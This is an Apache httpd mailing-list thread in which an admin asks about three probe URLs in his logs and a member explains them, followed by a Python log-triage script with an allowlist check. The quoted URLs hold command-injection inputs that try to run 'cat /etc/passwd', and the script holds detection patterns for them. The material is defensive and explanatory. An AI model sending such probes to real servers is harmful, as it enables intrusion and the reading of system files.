httpd-users mailing list archives

From rahul bhola <rb1223334...@gmail.com>
Subject Re: [users@httpd] Possible exploit?
Date Wed, 12 Feb 2014 16:43:49 GMT
Because of the HTTP response 302, a safe bet would be to say he didn't get
anything. Still, I would recommend you sanitize the data you get from the
parameters command and cmd.
Also, simply go to the URL to see what he saw.


On Wed, Feb 12, 2014 at 9:58 PM, Knute Johnson <apache@knutejohnson.com> wrote:

> On 2/12/2014 08:04, rahul bhola wrote:
>
>> In the first and last case he was checking if it is possible to pass shell
>> commands through the command or cmd parameter. Not sure on the second one, but it
>> looks like he was testing for an unsanitized URL redirection vulnerability.
>>
>>
>> On Wed, Feb 12, 2014 at 9:28 PM, Knute Johnson <apache@knutejohnson.com> wrote:
>>
>>     I found the following in my log this morning.  Does anybody know
>>     what it really means?  Thanks.
>>
>>       A total of 3 possible successful probes were detected (the
>>     following URLs
>>       contain strings that match one or more of a listing of strings that
>>       indicate a possible exploit):
>>
>>
>>     /user.php?caselist[bad_file.txt][path]=http://www.google.com/humans.txt?&command=cat%20/etc/passwd
>>     HTTP Response 302
>>
>>     /sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=http://www.google.com/humans.txt?
>>     HTTP Response 302
>>
>>     /gepi/gestion/savebackup.php?filename=http://www.google.com/humans.txt?&cmd=cat/etc/passwd
>>     HTTP Response 302
>>
>>
>>     --
>>
>>     Knute Johnson
>>
>>     ---------------------------------------------------------------------
>>     To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>>     For additional commands, e-mail: users-help@httpd.apache.org
>>
>>
>>
>>
>>
>> --
>> Rahul Bhola
>> B.E.
>> computers
>> Core Member
>> Department of backstage
>> Bits Pilani KK Birla Goa Campus
>>
>
> So you think he was trying to get the content of my passwd file?  So what
> would that get him?
>
> Is it possible to do this myself to see what he could have gotten?
>
> Thanks,
>
>
> --
>
> Knute Johnson
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
>


-- 
Rahul Bhola
B.E.
computers
Core Member
Department of backstage
Bits Pilani KK Birla Goa Campus
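To make the quoted log entries concrete, the following triage script is an added example, not code from the httpd project or from anyone in this thread. It splits each logged request into its query parameters and flags the two patterns Rahul describes: parameter values that are themselves absolute URLs (remote-file-inclusion / redirect probing) and `cmd` / `command` values that look like shell text (command-injection probing). It also shows the kind of allowlist check his "sanitize" advice amounts to for a filename-type parameter. The log lines are constructed from the three URLs quoted above with a made-up client address and timestamps; the parameter names, the shell-token regex and the `is_safe_filename` rules are my assumptions, not anything the thread specifies.

```python
"""Triage helper for access-log lines like the ones quoted in this thread.

Added example, not code from the httpd project or from anyone in the thread.
It splits each request into query parameters and flags two things the
thread discusses: parameter values that are themselves absolute URLs
(remote-file-inclusion / redirect probing) and `cmd` / `command` values
that look like shell text (command-injection probing).
"""
import re
from typing import List, Tuple
from urllib.parse import parse_qsl, urlsplit

# Parameter names the thread singles out (assumption: extend as needed).
COMMAND_PARAMS = {"cmd", "command"}
# Tokens that only make sense if a value is meant for a shell (assumption).
SHELL_TOKENS = re.compile(r"\bcat\b|/etc/passwd|[;|`$]", re.I)
ABSOLUTE_URL = re.compile(r"^(?:https?|ftp)://", re.I)
# Request path and status code in combined log format.
REQUEST_RE = re.compile(r'"(?:[A-Z]+) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed log lines: the three request URLs quoted in the thread plus
# one benign request; client addresses and timestamps are made up.
LOG_LINES = [
    '203.0.113.5 - - [12/Feb/2014:06:01:12 +0000] "GET /user.php?caselist[bad_file.txt][path]=http://www.google.com/humans.txt?&command=cat%20/etc/passwd HTTP/1.1" 302 230',
    '203.0.113.5 - - [12/Feb/2014:06:01:13 +0000] "GET /sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=http://www.google.com/humans.txt? HTTP/1.1" 302 230',
    '203.0.113.5 - - [12/Feb/2014:06:01:14 +0000] "GET /gepi/gestion/savebackup.php?filename=http://www.google.com/humans.txt?&cmd=cat/etc/passwd HTTP/1.1" 302 230',
    '198.51.100.7 - - [12/Feb/2014:06:05:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120',
]


def classify_request(raw_path: str) -> List[str]:
    """Return indicator names found in one request path, in parameter order."""
    parts = urlsplit(raw_path)
    query = parts.query
    # The second quoted probe has no '?' before its parameters; fall back to
    # treating the path itself as a query string when it carries '='.
    if not query and "=" in parts.path:
        query = parts.path.lstrip("/")
    findings = []
    # parse_qsl percent-decodes values, so 'cat%20/etc/passwd' is seen the
    # way the application would have seen it.
    for name, value in parse_qsl(query, keep_blank_values=True):
        # Strip PHP-style array suffixes: caselist[bad_file.txt][path] -> caselist
        base = name.split("[", 1)[0].lower()
        if ABSOLUTE_URL.match(value):
            findings.append(f"remote-url-in-param:{name}")
        if base in COMMAND_PARAMS and SHELL_TOKENS.search(value):
            findings.append(f"shell-text-in-param:{name}")
    return findings


def scan_log(lines: List[str]) -> List[Tuple[str, str, List[str]]]:
    """Return (path, status, findings) for every line with at least one finding."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path, status = match.groups()
        findings = classify_request(path)
        if findings:
            hits.append((path, status, findings))
    return hits


def is_safe_filename(value: str) -> bool:
    """Allowlist check for a filename-type parameter: a plain name with no
    path separators, no URL scheme and no traversal. Assumption: rules chosen
    for this example, not taken from any application in the thread."""
    return bool(re.fullmatch(r"[A-Za-z0-9][A-Za-z0-9._-]{0,254}", value)) and ".." not in value


if __name__ == "__main__":
    for path, status, findings in scan_log(LOG_LINES):
        # A 302 means the app redirected rather than served anything, which is
        # the point Rahul makes; the findings still say what the probe aimed at.
        print(f"{status} {path}\n    {', '.join(findings)}")
```

Running it lists the three probe lines with their status and the parameters that triggered, and skips the benign request. The allowlist function is the shape of fix the thread recommends: rather than trying to strip shell metacharacters or URL prefixes out of `filename`, `command` or `cmd`, accept only values that match what the application legitimately expects and reject everything else.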
